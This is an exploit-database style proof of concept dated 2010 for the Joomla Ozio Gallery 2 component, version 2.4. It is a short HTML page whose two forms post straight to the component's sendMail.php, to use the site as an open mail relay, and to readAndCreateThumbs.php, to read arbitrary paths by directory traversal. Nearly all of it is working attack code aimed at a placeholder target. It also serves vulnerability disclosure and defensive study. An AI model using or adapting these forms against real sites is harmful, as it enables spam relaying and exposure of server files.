<!-- # Exploit Title: Joomla Component Ozio Gallery 2 Multiple Vulnerabilities # Date: 28 May 2010 # Author: jdc # Software Link: http://extensions.joomla.org/extensions/photos-a-images/photo-flash-gallery/4883 # Version: 2.4 # Tested on: PHP5, MySQL5 --> <h2>Ozio Gallery 2</h2> <h3>v 2.4</h3> <h4>Open Mail Relay:</h4> <form method="post" action="http://[target]/components/com_oziogallery2/imagin/scripts_ralcr/others/sendMail.php"> <label for="to">To:</label><input id="to" name="to" type="text" /><br /> <label for="from">From:</label><input id="from" name="from" type="text" /><br /> <label for="subject">Subject:</label><input id="subject" name="subject" type="text" /><br /> <label for="message">Message:</label><textarea id="message" name="message"></textarea><br /> <input type="submit" value="Send"/> </form> <h4>Directory Traversal:</h4> <form method="post" action="http://[target]/components/com_oziogallery2/imagin/scripts_ralcr/filesystem/readAndCreateThumbs.php"> <label for="path">path:</label><input id="path" name="path" type="text" /><br /> <input type="submit" value="Send"/> </form>
体验盒子
